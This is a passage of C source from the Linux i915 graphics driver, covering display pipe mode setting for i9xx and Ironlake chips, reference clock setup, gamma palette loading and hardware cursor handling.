temp |= LVDS_PORT_EN | LVDS_A0A2_CLKA_POWER_UP;
if (pipe == 1) {
temp |= LVDS_PIPEB_SELECT;
} else {
temp &= ~LVDS_PIPEB_SELECT;
}
/* set the corresponsding LVDS_BORDER bit */
temp |= dev_priv->lvds_border_bits;
/* Set the B0-B3 data pairs corresponding to whether we're going to
* set the DPLLs for dual-channel mode or not.
*/
if (clock.p2 == 7)
temp |= LVDS_B0B3_POWER_UP | LVDS_CLKB_POWER_UP;
else
temp &= ~(LVDS_B0B3_POWER_UP | LVDS_CLKB_POWER_UP);
/* It would be nice to set 24 vs 18-bit mode (LVDS_A3_POWER_UP)
* appropriately here, but we need to look more thoroughly into how
* panels behave in the two modes.
*/
/* set the dithering flag on LVDS as needed */
if (INTEL_INFO(dev)->gen >= 4) {
if (dev_priv->lvds_dither)
temp |= LVDS_ENABLE_DITHER;
else
temp &= ~LVDS_ENABLE_DITHER;
}
if (adjusted_mode->flags & DRM_MODE_FLAG_NHSYNC)
lvds_sync |= LVDS_HSYNC_POLARITY;
if (adjusted_mode->flags & DRM_MODE_FLAG_NVSYNC)
lvds_sync |= LVDS_VSYNC_POLARITY;
if ((temp & (LVDS_HSYNC_POLARITY | LVDS_VSYNC_POLARITY))
!= lvds_sync) {
char flags[2] = "-+";
DRM_INFO("Changing LVDS panel from "
"(%chsync, %cvsync) to (%chsync, %cvsync)\n",
flags[!(temp & LVDS_HSYNC_POLARITY)],
flags[!(temp & LVDS_VSYNC_POLARITY)],
flags[!(lvds_sync & LVDS_HSYNC_POLARITY)],
flags[!(lvds_sync & LVDS_VSYNC_POLARITY)]);
temp &= ~(LVDS_HSYNC_POLARITY | LVDS_VSYNC_POLARITY);
temp |= lvds_sync;
}
I915_WRITE(LVDS, temp);
}
if (is_dp) {
intel_dp_set_m_n(crtc, mode, adjusted_mode);
}
I915_WRITE(DPLL(pipe), dpll);
/* Wait for the clocks to stabilize. */
POSTING_READ(DPLL(pipe));
udelay(150);
if (INTEL_INFO(dev)->gen >= 4) {
temp = 0;
if (is_sdvo) {
temp = intel_mode_get_pixel_multiplier(adjusted_mode);
if (temp > 1)
temp = (temp - 1) << DPLL_MD_UDI_MULTIPLIER_SHIFT;
else
temp = 0;
}
I915_WRITE(DPLL_MD(pipe), temp);
} else {
/* The pixel multiplier can only be updated once the
* DPLL is enabled and the clocks are stable.
*
* So write it again.
*/
I915_WRITE(DPLL(pipe), dpll);
}
intel_crtc->lowfreq_avail = false;
if (is_lvds && has_reduced_clock && i915_powersave) {
I915_WRITE(FP1(pipe), fp2);
intel_crtc->lowfreq_avail = true;
if (HAS_PIPE_CXSR(dev)) {
DRM_DEBUG_KMS("enabling CxSR downclocking\n");
pipeconf |= PIPECONF_CXSR_DOWNCLOCK;
}
} else {
I915_WRITE(FP1(pipe), fp);
if (HAS_PIPE_CXSR(dev)) {
DRM_DEBUG_KMS("disabling CxSR downclocking\n");
pipeconf &= ~PIPECONF_CXSR_DOWNCLOCK;
}
}
if (adjusted_mode->flags & DRM_MODE_FLAG_INTERLACE) {
pipeconf |= PIPECONF_INTERLACE_W_FIELD_INDICATION;
/* the chip adds 2 halflines automatically */
adjusted_mode->crtc_vdisplay -= 1;
adjusted_mode->crtc_vtotal -= 1;
adjusted_mode->crtc_vblank_start -= 1;
adjusted_mode->crtc_vblank_end -= 1;
adjusted_mode->crtc_vsync_end -= 1;
adjusted_mode->crtc_vsync_start -= 1;
} else
pipeconf &= ~PIPECONF_INTERLACE_W_FIELD_INDICATION; /* progressive */
I915_WRITE(HTOTAL(pipe),
(adjusted_mode->crtc_hdisplay - 1) |
((adjusted_mode->crtc_htotal - 1) << 16));
I915_WRITE(HBLANK(pipe),
(adjusted_mode->crtc_hblank_start - 1) |
((adjusted_mode->crtc_hblank_end - 1) << 16));
I915_WRITE(HSYNC(pipe),
(adjusted_mode->crtc_hsync_start - 1) |
((adjusted_mode->crtc_hsync_end - 1) << 16));
I915_WRITE(VTOTAL(pipe),
(adjusted_mode->crtc_vdisplay - 1) |
((adjusted_mode->crtc_vtotal - 1) << 16));
I915_WRITE(VBLANK(pipe),
(adjusted_mode->crtc_vblank_start - 1) |
((adjusted_mode->crtc_vblank_end - 1) << 16));
I915_WRITE(VSYNC(pipe),
(adjusted_mode->crtc_vsync_start - 1) |
((adjusted_mode->crtc_vsync_end - 1) << 16));
/* pipesrc and dspsize control the size that is scaled from,
* which should always be the user's requested size.
*/
I915_WRITE(DSPSIZE(plane),
((mode->vdisplay - 1) << 16) |
(mode->hdisplay - 1));
I915_WRITE(DSPPOS(plane), 0);
I915_WRITE(PIPESRC(pipe),
((mode->hdisplay - 1) << 16) | (mode->vdisplay - 1));
I915_WRITE(PIPECONF(pipe), pipeconf);
POSTING_READ(PIPECONF(pipe));
intel_enable_pipe(dev_priv, pipe, false);
intel_wait_for_vblank(dev, pipe);
I915_WRITE(DSPCNTR(plane), dspcntr);
POSTING_READ(DSPCNTR(plane));
intel_enable_plane(dev_priv, plane, pipe);
ret = intel_pipe_set_base(crtc, x, y, old_fb);
intel_update_watermarks(dev);
return ret;
}
static void ironlake_update_pch_refclk(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
struct drm_mode_config *mode_config = &dev->mode_config;
struct drm_crtc *crtc;
struct intel_encoder *encoder;
struct intel_encoder *has_edp_encoder = NULL;
u32 temp;
bool has_lvds = false;
/* We need to take the global config into account */
list_for_each_entry(crtc, &mode_config->crtc_list, head) {
if (!crtc->enabled)
continue;
list_for_each_entry(encoder, &mode_config->encoder_list,
base.head) {
if (encoder->base.crtc != crtc)
continue;
switch (encoder->type) {
case INTEL_OUTPUT_LVDS:
has_lvds = true;
case INTEL_OUTPUT_EDP:
has_edp_encoder = encoder;
break;
}
}
}
/* Ironlake: try to setup display ref clock before DPLL
* enabling. This is only under driver's control after
* PCH B stepping, previous chipset stepping should be
* ignoring this setting.
*/
temp = I915_READ(PCH_DREF_CONTROL);
/* Always enable nonspread source */
temp &= ~DREF_NONSPREAD_SOURCE_MASK;
temp |= DREF_NONSPREAD_SOURCE_ENABLE;
temp &= ~DREF_SSC_SOURCE_MASK;
temp |= DREF_SSC_SOURCE_ENABLE;
I915_WRITE(PCH_DREF_CONTROL, temp);
POSTING_READ(PCH_DREF_CONTROL);
udelay(200);
if (has_edp_encoder) {
if (intel_panel_use_ssc(dev_priv)) {
temp |= DREF_SSC1_ENABLE;
I915_WRITE(PCH_DREF_CONTROL, temp);
POSTING_READ(PCH_DREF_CONTROL);
udelay(200);
}
temp &= ~DREF_CPU_SOURCE_OUTPUT_MASK;
/* Enable CPU source on CPU attached eDP */
if (!intel_encoder_is_pch_edp(&has_edp_encoder->base)) {
if (intel_panel_use_ssc(dev_priv))
temp |= DREF_CPU_SOURCE_OUTPUT_DOWNSPREAD;
else
temp |= DREF_CPU_SOURCE_OUTPUT_NONSPREAD;
} else {
/* Enable SSC on PCH eDP if needed */
if (intel_panel_use_ssc(dev_priv)) {
DRM_ERROR("enabling SSC on PCH\n");
temp |= DREF_SUPERSPREAD_SOURCE_ENABLE;
}
}
I915_WRITE(PCH_DREF_CONTROL, temp);
POSTING_READ(PCH_DREF_CONTROL);
udelay(200);
}
}
static int ironlake_crtc_mode_set(struct drm_crtc *crtc,
struct drm_display_mode *mode,
struct drm_display_mode *adjusted_mode,
int x, int y,
struct drm_framebuffer *old_fb)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
int plane = intel_crtc->plane;
int refclk, num_connectors = 0;
intel_clock_t clock, reduced_clock;
u32 dpll, fp = 0, fp2 = 0, dspcntr, pipeconf;
bool ok, has_reduced_clock = false, is_sdvo = false;
bool is_crt = false, is_lvds = false, is_tv = false, is_dp = false;
struct intel_encoder *has_edp_encoder = NULL;
struct drm_mode_config *mode_config = &dev->mode_config;
struct intel_encoder *encoder;
const intel_limit_t *limit;
int ret;
struct fdi_m_n m_n = {0};
u32 temp;
u32 lvds_sync = 0;
int target_clock, pixel_multiplier, lane, link_bw, factor;
unsigned int pipe_bpp;
bool dither;
list_for_each_entry(encoder, &mode_config->encoder_list, base.head) {
if (encoder->base.crtc != crtc)
continue;
switch (encoder->type) {
case INTEL_OUTPUT_LVDS:
is_lvds = true;
break;
case INTEL_OUTPUT_SDVO:
case INTEL_OUTPUT_HDMI:
is_sdvo = true;
if (encoder->needs_tv_clock)
is_tv = true;
break;
case INTEL_OUTPUT_TVOUT:
is_tv = true;
break;
case INTEL_OUTPUT_ANALOG:
is_crt = true;
break;
case INTEL_OUTPUT_DISPLAYPORT:
is_dp = true;
break;
case INTEL_OUTPUT_EDP:
has_edp_encoder = encoder;
break;
}
num_connectors++;
}
if (is_lvds && intel_panel_use_ssc(dev_priv) && num_connectors < 2) {
refclk = dev_priv->lvds_ssc_freq * 1000;
DRM_DEBUG_KMS("using SSC reference clock of %d MHz\n",
refclk / 1000);
} else {
refclk = 96000;
if (!has_edp_encoder ||
intel_encoder_is_pch_edp(&has_edp_encoder->base))
refclk = 120000; /* 120Mhz refclk */
}
/*
* Returns a set of divisors for the desired target clock with the given
* refclk, or FALSE. The returned values represent the clock equation:
* reflck * (5 * (m1 + 2) + (m2 + 2)) / (n + 2) / p1 / p2.
*/
limit = intel_limit(crtc, refclk);
ok = limit->find_pll(limit, crtc, adjusted_mode->clock, refclk, &clock);
if (!ok) {
DRM_ERROR("Couldn't find PLL settings for mode!\n");
return -EINVAL;
}
/* Ensure that the cursor is valid for the new mode before changing... */
intel_crtc_update_cursor(crtc, true);
if (is_lvds && dev_priv->lvds_downclock_avail) {
has_reduced_clock = limit->find_pll(limit, crtc,
dev_priv->lvds_downclock,
refclk,
&reduced_clock);
if (has_reduced_clock && (clock.p != reduced_clock.p)) {
/*
* If the different P is found, it means that we can't
* switch the display clock by using the FP0/FP1.
* In such case we will disable the LVDS downclock
* feature.
*/
DRM_DEBUG_KMS("Different P is found for "
"LVDS clock/downclock\n");
has_reduced_clock = 0;
}
}
/* SDVO TV has fixed PLL values depend on its clock range,
this mirrors vbios setting. */
if (is_sdvo && is_tv) {
if (adjusted_mode->clock >= 100000
&& adjusted_mode->clock < 140500) {
clock.p1 = 2;
clock.p2 = 10;
clock.n = 3;
clock.m1 = 16;
clock.m2 = 8;
} else if (adjusted_mode->clock >= 140500
&& adjusted_mode->clock <= 200000) {
clock.p1 = 1;
clock.p2 = 10;
clock.n = 6;
clock.m1 = 12;
clock.m2 = 8;
}
}
/* FDI link */
pixel_multiplier = intel_mode_get_pixel_multiplier(adjusted_mode);
lane = 0;
/* CPU eDP doesn't require FDI link, so just set DP M/N
according to current link config */
if (has_edp_encoder &&
!intel_encoder_is_pch_edp(&has_edp_encoder->base)) {
target_clock = mode->clock;
intel_edp_link_config(has_edp_encoder,
&lane, &link_bw);
} else {
/* [e]DP over FDI requires target mode clock
instead of link clock */
if (is_dp || intel_encoder_is_pch_edp(&has_edp_encoder->base))
target_clock = mode->clock;
else
target_clock = adjusted_mode->clock;
/* FDI is a binary signal running at ~2.7GHz, encoding
* each output octet as 10 bits. The actual frequency
* is stored as a divider into a 100MHz clock, and the
* mode pixel clock is stored in units of 1KHz.
* Hence the bw of each lane in terms of the mode signal
* is:
*/
link_bw = intel_fdi_link_freq(dev) * MHz(100)/KHz(1)/10;
}
/* determine panel color depth */
temp = I915_READ(PIPECONF(pipe));
temp &= ~PIPE_BPC_MASK;
dither = intel_choose_pipe_bpp_dither(crtc, &pipe_bpp);
switch (pipe_bpp) {
case 18:
temp |= PIPE_6BPC;
break;
case 24:
temp |= PIPE_8BPC;
break;
case 30:
temp |= PIPE_10BPC;
break;
case 36:
temp |= PIPE_12BPC;
break;
default:
WARN(1, "intel_choose_pipe_bpp returned invalid value %d\n",
pipe_bpp);
temp |= PIPE_8BPC;
pipe_bpp = 24;
break;
}
intel_crtc->bpp = pipe_bpp;
I915_WRITE(PIPECONF(pipe), temp);
if (!lane) {
/*
* Account for spread spectrum to avoid
* oversubscribing the link. Max center spread
* is 2.5%; use 5% for safety's sake.
*/
u32 bps = target_clock * intel_crtc->bpp * 21 / 20;
lane = bps / (link_bw * 8) + 1;
}
intel_crtc->fdi_lanes = lane;
if (pixel_multiplier > 1)
link_bw *= pixel_multiplier;
ironlake_compute_m_n(intel_crtc->bpp, lane, target_clock, link_bw,
&m_n);
ironlake_update_pch_refclk(dev);
fp = clock.n << 16 | clock.m1 << 8 | clock.m2;
if (has_reduced_clock)
fp2 = reduced_clock.n << 16 | reduced_clock.m1 << 8 |
reduced_clock.m2;
/* Enable autotuning of the PLL clock (if permissible) */
factor = 21;
if (is_lvds) {
if ((intel_panel_use_ssc(dev_priv) &&
dev_priv->lvds_ssc_freq == 100) ||
(I915_READ(PCH_LVDS) & LVDS_CLKB_POWER_MASK) == LVDS_CLKB_POWER_UP)
factor = 25;
} else if (is_sdvo && is_tv)
factor = 20;
if (clock.m < factor * clock.n)
fp |= FP_CB_TUNE;
dpll = 0;
if (is_lvds)
dpll |= DPLLB_MODE_LVDS;
else
dpll |= DPLLB_MODE_DAC_SERIAL;
if (is_sdvo) {
int pixel_multiplier = intel_mode_get_pixel_multiplier(adjusted_mode);
if (pixel_multiplier > 1) {
dpll |= (pixel_multiplier - 1) << PLL_REF_SDVO_HDMI_MULTIPLIER_SHIFT;
}
dpll |= DPLL_DVO_HIGH_SPEED;
}
if (is_dp || intel_encoder_is_pch_edp(&has_edp_encoder->base))
dpll |= DPLL_DVO_HIGH_SPEED;
/* compute bitmask from p1 value */
dpll |= (1 << (clock.p1 - 1)) << DPLL_FPA01_P1_POST_DIV_SHIFT;
/* also FPA1 */
dpll |= (1 << (clock.p1 - 1)) << DPLL_FPA1_P1_POST_DIV_SHIFT;
switch (clock.p2) {
case 5:
dpll |= DPLL_DAC_SERIAL_P2_CLOCK_DIV_5;
break;
case 7:
dpll |= DPLLB_LVDS_P2_CLOCK_DIV_7;
break;
case 10:
dpll |= DPLL_DAC_SERIAL_P2_CLOCK_DIV_10;
break;
case 14:
dpll |= DPLLB_LVDS_P2_CLOCK_DIV_14;
break;
}
if (is_sdvo && is_tv)
dpll |= PLL_REF_INPUT_TVCLKINBC;
else if (is_tv)
/* XXX: just matching BIOS for now */
/* dpll |= PLL_REF_INPUT_TVCLKINBC; */
dpll |= 3;
else if (is_lvds && intel_panel_use_ssc(dev_priv) && num_connectors < 2)
dpll |= PLLB_REF_INPUT_SPREADSPECTRUMIN;
else
dpll |= PLL_REF_INPUT_DREFCLK;
/* setup pipeconf */
pipeconf = I915_READ(PIPECONF(pipe));
/* Set up the display plane register */
dspcntr = DISPPLANE_GAMMA_ENABLE;
DRM_DEBUG_KMS("Mode for pipe %c:\n", pipe == 0 ? 'A' : 'B');
drm_mode_debug_printmodeline(mode);
/* PCH eDP needs FDI, but CPU eDP does not */
if (!has_edp_encoder || intel_encoder_is_pch_edp(&has_edp_encoder->base)) {
I915_WRITE(PCH_FP0(pipe), fp);
I915_WRITE(PCH_DPLL(pipe), dpll & ~DPLL_VCO_ENABLE);
POSTING_READ(PCH_DPLL(pipe));
udelay(150);
}
/* enable transcoder DPLL */
if (HAS_PCH_CPT(dev)) {
temp = I915_READ(PCH_DPLL_SEL);
switch (pipe) {
case 0:
temp |= TRANSA_DPLL_ENABLE | TRANSA_DPLLA_SEL;
break;
case 1:
temp |= TRANSB_DPLL_ENABLE | TRANSB_DPLLB_SEL;
break;
case 2:
/* FIXME: manage transcoder PLLs? */
temp |= TRANSC_DPLL_ENABLE | TRANSC_DPLLB_SEL;
break;
default:
BUG();
}
I915_WRITE(PCH_DPLL_SEL, temp);
POSTING_READ(PCH_DPLL_SEL);
udelay(150);
}
/* The LVDS pin pair needs to be on before the DPLLs are enabled.
* This is an exception to the general rule that mode_set doesn't turn
* things on.
*/
if (is_lvds) {
temp = I915_READ(PCH_LVDS);
temp |= LVDS_PORT_EN | LVDS_A0A2_CLKA_POWER_UP;
if (pipe == 1) {
if (HAS_PCH_CPT(dev))
temp |= PORT_TRANS_B_SEL_CPT;
else
temp |= LVDS_PIPEB_SELECT;
} else {
if (HAS_PCH_CPT(dev))
temp &= ~PORT_TRANS_SEL_MASK;
else
temp &= ~LVDS_PIPEB_SELECT;
}
/* set the corresponsding LVDS_BORDER bit */
temp |= dev_priv->lvds_border_bits;
/* Set the B0-B3 data pairs corresponding to whether we're going to
* set the DPLLs for dual-channel mode or not.
*/
if (clock.p2 == 7)
temp |= LVDS_B0B3_POWER_UP | LVDS_CLKB_POWER_UP;
else
temp &= ~(LVDS_B0B3_POWER_UP | LVDS_CLKB_POWER_UP);
/* It would be nice to set 24 vs 18-bit mode (LVDS_A3_POWER_UP)
* appropriately here, but we need to look more thoroughly into how
* panels behave in the two modes.
*/
if (adjusted_mode->flags & DRM_MODE_FLAG_NHSYNC)
lvds_sync |= LVDS_HSYNC_POLARITY;
if (adjusted_mode->flags & DRM_MODE_FLAG_NVSYNC)
lvds_sync |= LVDS_VSYNC_POLARITY;
if ((temp & (LVDS_HSYNC_POLARITY | LVDS_VSYNC_POLARITY))
!= lvds_sync) {
char flags[2] = "-+";
DRM_INFO("Changing LVDS panel from "
"(%chsync, %cvsync) to (%chsync, %cvsync)\n",
flags[!(temp & LVDS_HSYNC_POLARITY)],
flags[!(temp & LVDS_VSYNC_POLARITY)],
flags[!(lvds_sync & LVDS_HSYNC_POLARITY)],
flags[!(lvds_sync & LVDS_VSYNC_POLARITY)]);
temp &= ~(LVDS_HSYNC_POLARITY | LVDS_VSYNC_POLARITY);
temp |= lvds_sync;
}
I915_WRITE(PCH_LVDS, temp);
}
pipeconf &= ~PIPECONF_DITHER_EN;
pipeconf &= ~PIPECONF_DITHER_TYPE_MASK;
if ((is_lvds && dev_priv->lvds_dither) || dither) {
pipeconf |= PIPECONF_DITHER_EN;
pipeconf |= PIPECONF_DITHER_TYPE_ST1;
}
if (is_dp || intel_encoder_is_pch_edp(&has_edp_encoder->base)) {
intel_dp_set_m_n(crtc, mode, adjusted_mode);
} else {
/* For non-DP output, clear any trans DP clock recovery setting.*/
I915_WRITE(TRANSDATA_M1(pipe), 0);
I915_WRITE(TRANSDATA_N1(pipe), 0);
I915_WRITE(TRANSDPLINK_M1(pipe), 0);
I915_WRITE(TRANSDPLINK_N1(pipe), 0);
}
if (!has_edp_encoder ||
intel_encoder_is_pch_edp(&has_edp_encoder->base)) {
I915_WRITE(PCH_DPLL(pipe), dpll);
/* Wait for the clocks to stabilize. */
POSTING_READ(PCH_DPLL(pipe));
udelay(150);
/* The pixel multiplier can only be updated once the
* DPLL is enabled and the clocks are stable.
*
* So write it again.
*/
I915_WRITE(PCH_DPLL(pipe), dpll);
}
intel_crtc->lowfreq_avail = false;
if (is_lvds && has_reduced_clock && i915_powersave) {
I915_WRITE(PCH_FP1(pipe), fp2);
intel_crtc->lowfreq_avail = true;
if (HAS_PIPE_CXSR(dev)) {
DRM_DEBUG_KMS("enabling CxSR downclocking\n");
pipeconf |= PIPECONF_CXSR_DOWNCLOCK;
}
} else {
I915_WRITE(PCH_FP1(pipe), fp);
if (HAS_PIPE_CXSR(dev)) {
DRM_DEBUG_KMS("disabling CxSR downclocking\n");
pipeconf &= ~PIPECONF_CXSR_DOWNCLOCK;
}
}
if (adjusted_mode->flags & DRM_MODE_FLAG_INTERLACE) {
pipeconf |= PIPECONF_INTERLACE_W_FIELD_INDICATION;
/* the chip adds 2 halflines automatically */
adjusted_mode->crtc_vdisplay -= 1;
adjusted_mode->crtc_vtotal -= 1;
adjusted_mode->crtc_vblank_start -= 1;
adjusted_mode->crtc_vblank_end -= 1;
adjusted_mode->crtc_vsync_end -= 1;
adjusted_mode->crtc_vsync_start -= 1;
} else
pipeconf &= ~PIPECONF_INTERLACE_W_FIELD_INDICATION; /* progressive */
I915_WRITE(HTOTAL(pipe),
(adjusted_mode->crtc_hdisplay - 1) |
((adjusted_mode->crtc_htotal - 1) << 16));
I915_WRITE(HBLANK(pipe),
(adjusted_mode->crtc_hblank_start - 1) |
((adjusted_mode->crtc_hblank_end - 1) << 16));
I915_WRITE(HSYNC(pipe),
(adjusted_mode->crtc_hsync_start - 1) |
((adjusted_mode->crtc_hsync_end - 1) << 16));
I915_WRITE(VTOTAL(pipe),
(adjusted_mode->crtc_vdisplay - 1) |
((adjusted_mode->crtc_vtotal - 1) << 16));
I915_WRITE(VBLANK(pipe),
(adjusted_mode->crtc_vblank_start - 1) |
((adjusted_mode->crtc_vblank_end - 1) << 16));
I915_WRITE(VSYNC(pipe),
(adjusted_mode->crtc_vsync_start - 1) |
((adjusted_mode->crtc_vsync_end - 1) << 16));
/* pipesrc controls the size that is scaled from, which should
* always be the user's requested size.
*/
I915_WRITE(PIPESRC(pipe),
((mode->hdisplay - 1) << 16) | (mode->vdisplay - 1));
I915_WRITE(PIPE_DATA_M1(pipe), TU_SIZE(m_n.tu) | m_n.gmch_m);
I915_WRITE(PIPE_DATA_N1(pipe), m_n.gmch_n);
I915_WRITE(PIPE_LINK_M1(pipe), m_n.link_m);
I915_WRITE(PIPE_LINK_N1(pipe), m_n.link_n);
if (has_edp_encoder &&
!intel_encoder_is_pch_edp(&has_edp_encoder->base)) {
ironlake_set_pll_edp(crtc, adjusted_mode->clock);
}
I915_WRITE(PIPECONF(pipe), pipeconf);
POSTING_READ(PIPECONF(pipe));
intel_wait_for_vblank(dev, pipe);
if (IS_GEN5(dev)) {
/* enable address swizzle for tiling buffer */
temp = I915_READ(DISP_ARB_CTL);
I915_WRITE(DISP_ARB_CTL, temp | DISP_TILE_SURFACE_SWIZZLING);
}
I915_WRITE(DSPCNTR(plane), dspcntr);
POSTING_READ(DSPCNTR(plane));
ret = intel_pipe_set_base(crtc, x, y, old_fb);
intel_update_watermarks(dev);
return ret;
}
static int intel_crtc_mode_set(struct drm_crtc *crtc,
struct drm_display_mode *mode,
struct drm_display_mode *adjusted_mode,
int x, int y,
struct drm_framebuffer *old_fb)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
int ret;
drm_vblank_pre_modeset(dev, pipe);
ret = dev_priv->display.crtc_mode_set(crtc, mode, adjusted_mode,
x, y, old_fb);
drm_vblank_post_modeset(dev, pipe);
intel_crtc->dpms_mode = DRM_MODE_DPMS_ON;
return ret;
}
/** Loads the palette/gamma unit for the CRTC with the prepared values */
void intel_crtc_load_lut(struct drm_crtc *crtc)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int palreg = PALETTE(intel_crtc->pipe);
int i;
/* The clocks have to be on to load the palette. */
if (!crtc->enabled)
return;
/* use legacy palette for Ironlake */
if (HAS_PCH_SPLIT(dev))
palreg = LGC_PALETTE(intel_crtc->pipe);
for (i = 0; i < 256; i++) {
I915_WRITE(palreg + 4 * i,
(intel_crtc->lut_r[i] << 16) |
(intel_crtc->lut_g[i] << 8) |
intel_crtc->lut_b[i]);
}
}
static void i845_update_cursor(struct drm_crtc *crtc, u32 base)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
bool visible = base != 0;
u32 cntl;
if (intel_crtc->cursor_visible == visible)
return;
cntl = I915_READ(_CURACNTR);
if (visible) {
/* On these chipsets we can only modify the base whilst
* the cursor is disabled.
*/
I915_WRITE(_CURABASE, base);
cntl &= ~(CURSOR_FORMAT_MASK);
/* XXX width must be 64, stride 256 => 0x00 << 28 */
cntl |= CURSOR_ENABLE |
CURSOR_GAMMA_ENABLE |
CURSOR_FORMAT_ARGB;
} else
cntl &= ~(CURSOR_ENABLE | CURSOR_GAMMA_ENABLE);
I915_WRITE(_CURACNTR, cntl);
intel_crtc->cursor_visible = visible;
}
static void i9xx_update_cursor(struct drm_crtc *crtc, u32 base)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
bool visible = base != 0;
if (intel_crtc->cursor_visible != visible) {
uint32_t cntl = I915_READ(CURCNTR(pipe));
if (base) {
cntl &= ~(CURSOR_MODE | MCURSOR_PIPE_SELECT);
cntl |= CURSOR_MODE_64_ARGB_AX | MCURSOR_GAMMA_ENABLE;
cntl |= pipe << 28; /* Connect to correct pipe */
} else {
cntl &= ~(CURSOR_MODE | MCURSOR_GAMMA_ENABLE);
cntl |= CURSOR_MODE_DISABLE;
}
I915_WRITE(CURCNTR(pipe), cntl);
intel_crtc->cursor_visible = visible;
}
/* and commit changes on next vblank */
I915_WRITE(CURBASE(pipe), base);
}
static void ivb_update_cursor(struct drm_crtc *crtc, u32 base)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
bool visible = base != 0;
if (intel_crtc->cursor_visible != visible) {
uint32_t cntl = I915_READ(CURCNTR_IVB(pipe));
if (base) {
cntl &= ~CURSOR_MODE;
cntl |= CURSOR_MODE_64_ARGB_AX | MCURSOR_GAMMA_ENABLE;
} else {
cntl &= ~(CURSOR_MODE | MCURSOR_GAMMA_ENABLE);
cntl |= CURSOR_MODE_DISABLE;
}
I915_WRITE(CURCNTR_IVB(pipe), cntl);
intel_crtc->cursor_visible = visible;
}
/* and commit changes on next vblank */
I915_WRITE(CURBASE_IVB(pipe), base);
}
/* If no-part of the cursor is visible on the framebuffer, then the GPU may hang... */
static void intel_crtc_update_cursor(struct drm_crtc *crtc,
bool on)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
int x = intel_crtc->cursor_x;
int y = intel_crtc->cursor_y;
u32 base, pos;
bool visible;
pos = 0;
if (on && crtc->enabled && crtc->fb) {
base = intel_crtc->cursor_addr;
if (x > (int) crtc->fb->width)
base = 0;
if (y > (int) crtc->fb->height)
base = 0;
} else
base = 0;
if (x < 0) {
if (x + intel_crtc->cursor_width < 0)
base = 0;
pos |= CURSOR_POS_SIGN << CURSOR_X_SHIFT;
x = -x;
}
pos |= x << CURSOR_X_SHIFT;
if (y < 0) {
if (y + intel_crtc->cursor_height < 0)
base = 0;
pos |= CURSOR_POS_SIGN << CURSOR_Y_SHIFT;
y = -y;
}
pos |= y << CURSOR_Y_SHIFT;
visible = base != 0;
if (!visible && !intel_crtc->cursor_visible)
return;
if (IS_IVYBRIDGE(dev)) {
I915_WRITE(CURPOS_IVB(pipe), pos);
ivb_update_cursor(crtc, base);
} else {
I915_WRITE(CURPOS(pipe), pos);
if (IS_845G(dev) || IS_I865G(dev))
i845_update_cursor(crtc, base);
else
i9xx_update_cursor(crtc, base);
}
if (visible)
intel_mark_busy(dev, to_intel_framebuffer(crtc->fb)->obj);
}
static int intel_crtc_cursor_set(struct drm_crtc *crtc,
struct drm_file *file,
uint32_t handle,
uint32_t width, uint32_t height)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
struct drm_i915_gem_object *obj;
uint32_t addr;
int ret;
DRM_DEBUG_KMS("\n");
/* if we want to turn off the cursor ignore width and height */
if (!handle) {
DRM_DEBUG_KMS("cursor off\n");
addr = 0;
obj = NULL;
mutex_lock(&dev->struct_mutex);
goto finish;
}
/* Currently we only support 64x64 cursors */
if (width != 64 || height != 64) {
DRM_ERROR("we currently only support 64x64 cursors\n");
return -EINVAL;
}
obj = to_intel_bo(drm_gem_object_lookup(dev, file, handle));
if (&obj->base == NULL)
return -ENOENT;
if (obj->base.size < width * height * 4) {
DRM_ERROR("buffer is to small\n");
ret = -ENOMEM;
goto fail;
}
/* we only need to pin inside GTT if cursor is non-phy */
mutex_lock(&dev->struct_mutex);
if (!dev_priv->info->cursor_needs_physical) {
if (obj->tiling_mode) {
DRM_ERROR("cursor cannot be tiled\n");
ret = -EINVAL;
goto fail_locked;
}
ret = i915_gem_object_pin_to_display_plane(obj, 0, NULL);
if (ret) {
DRM_ERROR("failed to move cursor bo into the GTT\n");
goto fail_locked;
}
ret = i915_gem_object_put_fence(obj);
if (ret) {
DRM_ERROR("failed to release fence for cursor");
goto fail_unpin;
}
addr = obj->gtt_offset;
} else {
int align = IS_I830(dev) ? 16 * 1024 : 256;
ret = i915_gem_attach_phys_object(dev, obj,
(intel_crtc->pipe == 0) ? I915_GEM_PHYS_CURSOR_0 : I915_GEM_PHYS_CURSOR_1,
align);
if (ret) {
DRM_ERROR("failed to attach phys object\n");
goto fail_locked;
}
addr = obj->phys_obj->handle->busaddr;
}
if (IS_GEN2(dev))
I915_WRITE(CURSIZE, (height << 12) | width);
finish:
if (intel_crtc->cursor_bo) {
if (dev_priv->info->cursor_needs_physical) {
if (intel_crtc->cursor_bo != obj)
i915_gem_detach_phys_object(dev, intel_crtc->cursor_bo);
} else
i915_gem_object_unpin(intel_crtc->cursor_bo);
drm_gem_object_unreference(&intel_crtc->cursor_bo->base);
}
mutex_unlock(&dev->struct_mutex);
intel_crtc->cursor_addr = addr;
intel_crtc->cursor_bo = obj;
intel_crtc->cursor_width = width;
intel_crtc->cursor_height = height;
intel_crtc_update_cursor(crtc, true);
return 0;
fail_unpin:
i915_gem_object_unpin(obj);
fail_locked:
mutex_unlock(&dev->struct_mutex);
fail:
drm_gem_object_unreference_unlocked(&obj->base);
return ret;
}
